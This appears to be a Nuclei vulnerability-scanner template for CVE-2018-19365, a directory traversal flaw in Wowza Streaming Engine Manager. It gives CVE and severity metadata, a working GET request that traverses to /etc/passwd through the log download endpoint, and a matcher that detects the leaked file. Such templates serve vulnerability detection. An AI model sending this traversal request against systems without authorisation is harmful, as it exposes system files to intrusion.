40 lines
1.2 KiB
YAML
40 lines
1.2 KiB
YAML
id: CVE-2018-19365
|
|
|
|
info:
|
|
name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal
|
|
author: 0x_Akoko
|
|
severity: critical
|
|
description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.
|
|
reference:
|
|
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-19365
|
|
- https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
|
|
cvss-score: 9.1
|
|
cve-id: CVE-2018-19365
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:wowza:streaming_engine:*:*:*:*:*:*:*:*
|
|
epss-score: 0.01368
|
|
tags: cve,cve2018,wowza,lfi
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/04/20
|